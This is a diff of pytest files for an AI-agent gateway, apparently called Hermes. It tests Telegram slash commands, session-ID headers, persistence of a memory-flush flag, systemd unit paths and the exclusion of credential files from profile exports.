async def send_and_capture(adapter: TelegramAdapter, text: str, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock.
|
||||
|
||||
Drives: adapter.handle_message → background task → runner dispatch → adapter.send.
|
||||
"""
|
||||
event = make_event(text, **event_kwargs)
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
# Let the background task complete
|
||||
await asyncio.sleep(0.3)
|
||||
return adapter.send
|
||||
217
tests/e2e/test_telegram_commands.py
Normal file
217
tests/e2e/test_telegram_commands.py
Normal file
@@ -0,0 +1,217 @@
|
||||
"""E2E tests for Telegram gateway slash commands.
|
||||
|
||||
Each test drives a message through the full async pipeline:
|
||||
adapter.handle_message(event)
|
||||
→ BasePlatformAdapter._process_message_background()
|
||||
→ GatewayRunner._handle_message() (command dispatch)
|
||||
→ adapter.send() (captured for assertions)
|
||||
|
||||
No LLM involved — only gateway-level commands are tested.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
from unittest.mock import AsyncMock
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.platforms.base import SendResult
|
||||
from tests.e2e.conftest import (
|
||||
make_adapter,
|
||||
make_event,
|
||||
make_runner,
|
||||
make_session_entry,
|
||||
make_source,
|
||||
send_and_capture,
|
||||
)
|
||||
|
||||
|
||||
#Fixtures
|
||||
|
||||
@pytest.fixture()
|
||||
def source():
|
||||
return make_source()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(source):
|
||||
return make_session_entry(source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(session_entry):
|
||||
return make_runner(session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(runner):
|
||||
return make_adapter(runner)
|
||||
|
||||
|
||||
#Tests
|
||||
|
||||
class TestTelegramSlashCommands:
|
||||
"""Gateway slash commands dispatched through the full adapter pipeline."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_help_returns_command_list(self, adapter):
|
||||
send = await send_and_capture(adapter, "/help")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "/new" in response_text
|
||||
assert "/status" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_status_shows_session_info(self, adapter):
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Status output includes session metadata
|
||||
assert "session" in response_text.lower() or "Session" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_resets_session(self, adapter, runner):
|
||||
send = await send_and_capture(adapter, "/new")
|
||||
|
||||
send.assert_called_once()
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stop_when_no_agent_running(self, adapter):
|
||||
send = await send_and_capture(adapter, "/stop")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
response_lower = response_text.lower()
|
||||
assert "no" in response_lower or "stop" in response_lower or "not running" in response_lower
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_commands_shows_listing(self, adapter):
|
||||
send = await send_and_capture(adapter, "/commands")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Should list at least some commands
|
||||
assert "/" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sequential_commands_share_session(self, adapter):
|
||||
"""Two commands from the same chat_id should both succeed."""
|
||||
send_help = await send_and_capture(adapter, "/help")
|
||||
send_help.assert_called_once()
|
||||
|
||||
send_status = await send_and_capture(adapter, "/status")
|
||||
send_status.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.xfail(
|
||||
reason="Bug: _handle_provider_command references unbound model_cfg when config.yaml is absent",
|
||||
strict=False,
|
||||
)
|
||||
async def test_provider_shows_current_provider(self, adapter):
|
||||
send = await send_and_capture(adapter, "/provider")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "provider" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_verbose_responds(self, adapter):
|
||||
send = await send_and_capture(adapter, "/verbose")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Either shows the mode cycle or tells user to enable it in config
|
||||
assert "verbose" in response_text.lower() or "tool_progress" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_personality_lists_options(self, adapter):
|
||||
send = await send_and_capture(adapter, "/personality")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "personalit" in response_text.lower() # matches "personality" or "personalities"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_yolo_toggles_mode(self, adapter):
|
||||
send = await send_and_capture(adapter, "/yolo")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "yolo" in response_text.lower()
|
||||
|
||||
|
||||
class TestSessionLifecycle:
|
||||
"""Verify session state changes across command sequences."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry):
|
||||
"""After /new, /status should report the fresh session."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Session ID from the entry should appear in the status output
|
||||
assert session_entry.session_id[:8] in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_is_idempotent(self, adapter, runner):
|
||||
"""/new called twice should not crash."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new")
|
||||
assert runner.session_store.reset_session.call_count == 2
|
||||
|
||||
|
||||
class TestAuthorization:
|
||||
"""Verify the pipeline handles unauthorized users."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner):
|
||||
"""Unauthorized DM should trigger pairing code, not a command response."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
# The adapter.send is called directly by the authorization path
|
||||
# (not via _send_with_retry), so check it was called with a pairing message
|
||||
adapter.send.assert_called()
|
||||
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
|
||||
assert "recognize" in response_text.lower() or "pair" in response_text.lower() or "ABC123" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner):
|
||||
"""Unauthorized user should NOT see the help command output."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
# If send was called, it should NOT contain the help text
|
||||
if adapter.send.called:
|
||||
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
|
||||
assert "/new" not in response_text
|
||||
|
||||
|
||||
class TestSendFailureResilience:
|
||||
"""Verify the pipeline handles send failures gracefully."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter):
|
||||
"""If send() returns failure, the pipeline should not raise."""
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=False, error="network timeout"))
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
|
||||
event = make_event("/help")
|
||||
# Should not raise — pipeline handles send failures internally
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
adapter.send.assert_called()
|
||||
@@ -1576,3 +1576,110 @@ class TestConversationParameter:
|
||||
assert resp.status == 200
|
||||
# Conversation mapping should NOT be set since store=false
|
||||
assert adapter._response_store.get_conversation("ephemeral-chat") is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# X-Hermes-Session-Id header (session continuity)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestSessionIdHeader:
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_session_response_includes_session_id_header(self, adapter):
|
||||
"""Without X-Hermes-Session-Id, a new session is created and returned in the header."""
|
||||
mock_result = {"final_response": "Hello!", "messages": [], "api_calls": 1}
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
|
||||
)
|
||||
assert resp.status == 200
|
||||
assert resp.headers.get("X-Hermes-Session-Id") is not None
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_provided_session_id_is_used_and_echoed(self, adapter):
|
||||
"""When X-Hermes-Session-Id is provided, it's passed to the agent and echoed in the response."""
|
||||
mock_result = {"final_response": "Continuing!", "messages": [], "api_calls": 1}
|
||||
mock_db = MagicMock()
|
||||
mock_db.get_messages_as_conversation.return_value = [
|
||||
{"role": "user", "content": "previous message"},
|
||||
{"role": "assistant", "content": "previous reply"},
|
||||
]
|
||||
adapter._session_db = mock_db
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "my-session-123"},
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Continue"}]},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
assert resp.headers.get("X-Hermes-Session-Id") == "my-session-123"
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
assert call_kwargs["session_id"] == "my-session-123"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_provided_session_id_loads_history_from_db(self, adapter):
|
||||
"""When X-Hermes-Session-Id is provided, history comes from SessionDB not request body."""
|
||||
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
|
||||
db_history = [
|
||||
{"role": "user", "content": "stored message 1"},
|
||||
{"role": "assistant", "content": "stored reply 1"},
|
||||
]
|
||||
mock_db = MagicMock()
|
||||
mock_db.get_messages_as_conversation.return_value = db_history
|
||||
adapter._session_db = mock_db
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "existing-session"},
|
||||
# Request body has different history — should be ignored
|
||||
json={
|
||||
"model": "hermes-agent",
|
||||
"messages": [
|
||||
{"role": "user", "content": "old msg from client"},
|
||||
{"role": "assistant", "content": "old reply from client"},
|
||||
{"role": "user", "content": "new question"},
|
||||
],
|
||||
},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
# History must come from DB, not from the request body
|
||||
assert call_kwargs["conversation_history"] == db_history
|
||||
assert call_kwargs["user_message"] == "new question"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_db_failure_falls_back_to_empty_history(self, adapter):
|
||||
"""If SessionDB raises, history falls back to empty and request still succeeds."""
|
||||
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
|
||||
# Simulate DB failure: _session_db is None and SessionDB() constructor raises
|
||||
adapter._session_db = None
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run, \
|
||||
patch("hermes_state.SessionDB", side_effect=Exception("DB unavailable")):
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "some-session"},
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
assert call_kwargs["conversation_history"] == []
|
||||
assert call_kwargs["session_id"] == "some-session"
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
Verifies that:
|
||||
1. _is_session_expired() works from a SessionEntry alone (no source needed)
|
||||
2. The sync callback is no longer called in get_or_create_session
|
||||
3. _pre_flushed_sessions tracking works correctly
|
||||
3. memory_flushed flag persists across save/load cycles (prevents restart re-flush)
|
||||
4. The background watcher can detect expired sessions
|
||||
"""
|
||||
|
||||
@@ -115,8 +115,8 @@ class TestIsSessionExpired:
|
||||
class TestGetOrCreateSessionNoCallback:
|
||||
"""get_or_create_session should NOT call a sync flush callback."""
|
||||
|
||||
def test_auto_reset_cleans_pre_flushed_marker(self, idle_store):
|
||||
"""When a session auto-resets, the pre_flushed marker should be discarded."""
|
||||
def test_auto_reset_creates_new_session_after_flush(self, idle_store):
|
||||
"""When a flushed session auto-resets, a new session_id is created."""
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="123",
|
||||
@@ -127,7 +127,7 @@ class TestGetOrCreateSessionNoCallback:
|
||||
old_sid = entry1.session_id
|
||||
|
||||
# Simulate the watcher having flushed it
|
||||
idle_store._pre_flushed_sessions.add(old_sid)
|
||||
entry1.memory_flushed = True
|
||||
|
||||
# Simulate the session going idle
|
||||
entry1.updated_at = datetime.now() - timedelta(minutes=120)
|
||||
@@ -137,9 +137,8 @@ class TestGetOrCreateSessionNoCallback:
|
||||
entry2 = idle_store.get_or_create_session(source)
|
||||
assert entry2.session_id != old_sid
|
||||
assert entry2.was_auto_reset is True
|
||||
|
||||
# The old session_id should be removed from pre_flushed
|
||||
assert old_sid not in idle_store._pre_flushed_sessions
|
||||
# New session starts with memory_flushed=False
|
||||
assert entry2.memory_flushed is False
|
||||
|
||||
def test_no_sync_callback_invoked(self, idle_store):
|
||||
"""No synchronous callback should block during auto-reset."""
|
||||
@@ -160,21 +159,91 @@ class TestGetOrCreateSessionNoCallback:
|
||||
assert entry2.was_auto_reset is True
|
||||
|
||||
|
||||
class TestPreFlushedSessionsTracking:
|
||||
"""The _pre_flushed_sessions set should prevent double-flushing."""
|
||||
class TestMemoryFlushedFlag:
|
||||
"""The memory_flushed flag on SessionEntry prevents double-flushing."""
|
||||
|
||||
def test_starts_empty(self, idle_store):
|
||||
assert len(idle_store._pre_flushed_sessions) == 0
|
||||
def test_defaults_to_false(self):
|
||||
entry = SessionEntry(
|
||||
session_key="agent:main:telegram:dm:123",
|
||||
session_id="sid_new",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
assert entry.memory_flushed is False
|
||||
|
||||
def test_add_and_check(self, idle_store):
|
||||
idle_store._pre_flushed_sessions.add("sid_old")
|
||||
assert "sid_old" in idle_store._pre_flushed_sessions
|
||||
assert "sid_other" not in idle_store._pre_flushed_sessions
|
||||
def test_persists_through_save_load(self, idle_store):
|
||||
"""memory_flushed=True must survive a save/load cycle (simulates restart)."""
|
||||
key = "agent:main:discord:thread:789"
|
||||
entry = SessionEntry(
|
||||
session_key=key,
|
||||
session_id="sid_flushed",
|
||||
created_at=datetime.now() - timedelta(hours=5),
|
||||
updated_at=datetime.now() - timedelta(hours=5),
|
||||
platform=Platform.DISCORD,
|
||||
chat_type="thread",
|
||||
memory_flushed=True,
|
||||
)
|
||||
idle_store._entries[key] = entry
|
||||
idle_store._save()
|
||||
|
||||
def test_discard_on_reset(self, idle_store):
|
||||
"""discard should remove without raising if not present."""
|
||||
idle_store._pre_flushed_sessions.add("sid_a")
|
||||
idle_store._pre_flushed_sessions.discard("sid_a")
|
||||
assert "sid_a" not in idle_store._pre_flushed_sessions
|
||||
# discard on non-existent should not raise
|
||||
idle_store._pre_flushed_sessions.discard("sid_nonexistent")
|
||||
# Simulate restart: clear in-memory state, reload from disk
|
||||
idle_store._entries.clear()
|
||||
idle_store._loaded = False
|
||||
idle_store._ensure_loaded()
|
||||
|
||||
reloaded = idle_store._entries[key]
|
||||
assert reloaded.memory_flushed is True
|
||||
|
||||
def test_unflushed_entry_survives_restart_as_unflushed(self, idle_store):
|
||||
"""An entry without memory_flushed stays False after reload."""
|
||||
key = "agent:main:telegram:dm:456"
|
||||
entry = SessionEntry(
|
||||
session_key=key,
|
||||
session_id="sid_not_flushed",
|
||||
created_at=datetime.now() - timedelta(hours=2),
|
||||
updated_at=datetime.now() - timedelta(hours=2),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
idle_store._entries[key] = entry
|
||||
idle_store._save()
|
||||
|
||||
idle_store._entries.clear()
|
||||
idle_store._loaded = False
|
||||
idle_store._ensure_loaded()
|
||||
|
||||
reloaded = idle_store._entries[key]
|
||||
assert reloaded.memory_flushed is False
|
||||
|
||||
def test_roundtrip_to_dict_from_dict(self):
|
||||
"""to_dict/from_dict must preserve memory_flushed."""
|
||||
entry = SessionEntry(
|
||||
session_key="agent:main:telegram:dm:999",
|
||||
session_id="sid_rt",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
memory_flushed=True,
|
||||
)
|
||||
d = entry.to_dict()
|
||||
assert d["memory_flushed"] is True
|
||||
|
||||
restored = SessionEntry.from_dict(d)
|
||||
assert restored.memory_flushed is True
|
||||
|
||||
def test_legacy_entry_without_field_defaults_false(self):
|
||||
"""Old sessions.json entries missing memory_flushed should default to False."""
|
||||
data = {
|
||||
"session_key": "agent:main:telegram:dm:legacy",
|
||||
"session_id": "sid_legacy",
|
||||
"created_at": datetime.now().isoformat(),
|
||||
"updated_at": datetime.now().isoformat(),
|
||||
"platform": "telegram",
|
||||
"chat_type": "dm",
|
||||
# no memory_flushed key
|
||||
}
|
||||
entry = SessionEntry.from_dict(data)
|
||||
assert entry.memory_flushed is False
|
||||
|
||||
@@ -271,7 +271,7 @@ class TestGatewaySystemServiceRouting:
|
||||
)
|
||||
|
||||
run_calls = []
|
||||
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=False, replace=False: run_calls.append((verbose, replace)))
|
||||
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=0, quiet=False, replace=False: run_calls.append((verbose, quiet, replace)))
|
||||
monkeypatch.setattr(gateway_cli, "kill_gateway_processes", lambda force=False: 0)
|
||||
|
||||
try:
|
||||
@@ -339,6 +339,102 @@ class TestDetectVenvDir:
|
||||
assert result is None
|
||||
|
||||
|
||||
class TestSystemUnitHermesHome:
|
||||
"""HERMES_HOME in system units must reference the target user, not root."""
|
||||
|
||||
def test_system_unit_uses_target_user_home_not_calling_user(self, monkeypatch):
|
||||
# Simulate sudo: Path.home() returns /root, target user is alice
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/home/alice/.hermes' in unit
|
||||
assert '/root/.hermes' not in unit
|
||||
|
||||
def test_system_unit_remaps_profile_to_target_user(self, monkeypatch):
|
||||
# Simulate sudo with a profile: HERMES_HOME was resolved under root
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/root/.hermes/profiles/coder")
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/home/alice/.hermes/profiles/coder' in unit
|
||||
assert '/root/' not in unit
|
||||
|
||||
def test_system_unit_preserves_custom_hermes_home(self, monkeypatch):
|
||||
# Custom HERMES_HOME not under any user's home — keep as-is
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/opt/hermes-shared")
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/opt/hermes-shared' in unit
|
||||
|
||||
def test_user_unit_unaffected_by_change(self):
|
||||
# User-scope units should still use the calling user's HERMES_HOME
|
||||
unit = gateway_cli.generate_systemd_unit(system=False)
|
||||
|
||||
hermes_home = str(gateway_cli.get_hermes_home().resolve())
|
||||
assert f'HERMES_HOME={hermes_home}' in unit
|
||||
|
||||
|
||||
class TestHermesHomeForTargetUser:
|
||||
"""Unit tests for _hermes_home_for_target_user()."""
|
||||
|
||||
def test_remaps_default_home(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes"
|
||||
|
||||
def test_remaps_profile_path(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/root/.hermes/profiles/coder")
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes/profiles/coder"
|
||||
|
||||
def test_keeps_custom_path(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/opt/hermes")
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/opt/hermes"
|
||||
|
||||
def test_noop_when_same_user(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/home/alice")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes"
|
||||
|
||||
|
||||
class TestGeneratedUnitUsesDetectedVenv:
|
||||
def test_systemd_unit_uses_dot_venv_when_detected(self, tmp_path, monkeypatch):
|
||||
dot_venv = tmp_path / ".venv"
|
||||
|
||||
52
tests/hermes_cli/test_profile_export_credentials.py
Normal file
52
tests/hermes_cli/test_profile_export_credentials.py
Normal file
@@ -0,0 +1,52 @@
|
||||
"""Tests for credential exclusion during profile export.
|
||||
|
||||
Profile exports should NEVER include auth.json or .env — these contain
|
||||
API keys, OAuth tokens, and credential pool data. Users share exported
|
||||
profiles; leaking credentials in the archive is a security issue.
|
||||
"""
|
||||
|
||||
import tarfile
|
||||
from pathlib import Path
|
||||
|
||||
from hermes_cli.profiles import export_profile, _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
|
||||
class TestCredentialExclusion:
|
||||
|
||||
def test_auth_json_in_default_exclude_set(self):
|
||||
"""auth.json must be in the default export exclusion set."""
|
||||
assert "auth.json" in _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
def test_dotenv_in_default_exclude_set(self):
|
||||
""".env must be in the default export exclusion set."""
|
||||
assert ".env" in _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
def test_named_profile_export_excludes_auth(self, tmp_path, monkeypatch):
|
||||
"""Named profile export must not contain auth.json or .env."""
|
||||
profiles_root = tmp_path / "profiles"
|
||||
profile_dir = profiles_root / "testprofile"
|
||||
profile_dir.mkdir(parents=True)
|
||||
|
||||
# Create a profile with credentials
|
||||
(profile_dir / "config.yaml").write_text("model: gpt-4\n")
|
||||
(profile_dir / "auth.json").write_text('{"tokens": {"access": "sk-secret"}}')
|
||||
(profile_dir / ".env").write_text("OPENROUTER_API_KEY=sk-secret-key\n")
|
||||
(profile_dir / "SOUL.md").write_text("I am helpful.\n")
|
||||
(profile_dir / "memories").mkdir()
|
||||
(profile_dir / "memories" / "MEMORY.md").write_text("# Memories\n")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.profiles._get_profiles_root", lambda: profiles_root)
|
||||
monkeypatch.setattr("hermes_cli.profiles.get_profile_dir", lambda n: profile_dir)
|
||||
monkeypatch.setattr("hermes_cli.profiles.validate_profile_name", lambda n: None)
|
||||
|
||||
output = tmp_path / "export.tar.gz"
|
||||
result = export_profile("testprofile", str(output))
|
||||
|
||||
# Check archive contents
|
||||
with tarfile.open(result, "r:gz") as tf:
|
||||
names = tf.getnames()
|
||||
|
||||
assert any("config.yaml" in n for n in names), "config.yaml should be in export"
|
||||
assert any("SOUL.md" in n for n in names), "SOUL.md should be in export"
|
||||
assert not any("auth.json" in n for n in names), "auth.json must NOT be in export"
|
||||
assert not any(".env" in n for n in names), ".env must NOT be in export"
|
||||
@@ -505,7 +505,7 @@ class TestExportImport:
|
||||
assert tarfile.is_tarfile(str(result))
|
||||
|
||||
def test_export_default_includes_profile_data(self, profile_env, tmp_path):
|
||||
"""Profile data files end up in the archive."""
|
||||
"""Profile data files end up in the archive (credentials excluded)."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("model: test")
|
||||
(default_dir / ".env").write_text("KEY=val")
|
||||
@@ -522,7 +522,7 @@ class TestExportImport:
|
||||
names = tf.getnames()
|
||||
|
||||
assert "default/config.yaml" in names
|
||||
assert "default/.env" in names
|
||||
assert "default/.env" not in names # credentials excluded
|
||||
assert "default/SOUL.md" in names
|
||||
assert "default/memories/MEMORY.md" in names
|
||||
|
||||
|
||||
@@ -704,14 +704,14 @@ class TestHasAnyProviderConfigured:
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
def test_config_dict_no_provider_no_creds_still_false(self, monkeypatch, tmp_path):
|
||||
"""config.yaml model dict with only 'default' key and no creds stays false."""
|
||||
"""config.yaml model dict with empty default and no creds stays false."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({
|
||||
"model": {"default": "anthropic/claude-opus-4.6"},
|
||||
"model": {"default": ""},
|
||||
}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
|
||||
@@ -187,12 +187,12 @@ class TestNormalizeModelForProvider:
|
||||
assert cli.model == "claude-opus-4.6"
|
||||
|
||||
def test_default_model_replaced(self):
|
||||
"""The untouched default (anthropic/claude-opus-4.6) gets swapped."""
|
||||
"""No model configured (empty default) gets swapped for codex."""
|
||||
import cli as _cli_mod
|
||||
_clean_config = {
|
||||
"model": {
|
||||
"default": "anthropic/claude-opus-4.6",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"default": "",
|
||||
"base_url": "",
|
||||
"provider": "auto",
|
||||
},
|
||||
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},
|
||||
@@ -219,12 +219,12 @@ class TestNormalizeModelForProvider:
|
||||
assert cli.model == "gpt-5.3-codex"
|
||||
|
||||
def test_default_fallback_when_api_fails(self):
|
||||
"""Default model falls back to gpt-5.3-codex when API unreachable."""
|
||||
"""No model configured falls back to gpt-5.3-codex when API unreachable."""
|
||||
import cli as _cli_mod
|
||||
_clean_config = {
|
||||
"model": {
|
||||
"default": "anthropic/claude-opus-4.6",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"default": "",
|
||||
"base_url": "",
|
||||
"provider": "auto",
|
||||
},
|
||||
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},
|
||||
|
||||
@@ -137,6 +137,76 @@ class TestBuildApiKwargsOpenRouter:
|
||||
assert "codex_reasoning_items" in messages[1]
|
||||
|
||||
|
||||
class TestDeveloperRoleSwap:
|
||||
"""GPT-5 and Codex models should get 'developer' instead of 'system' role."""
|
||||
|
||||
@pytest.mark.parametrize("model", [
|
||||
"openai/gpt-5",
|
||||
"openai/gpt-5-turbo",
|
||||
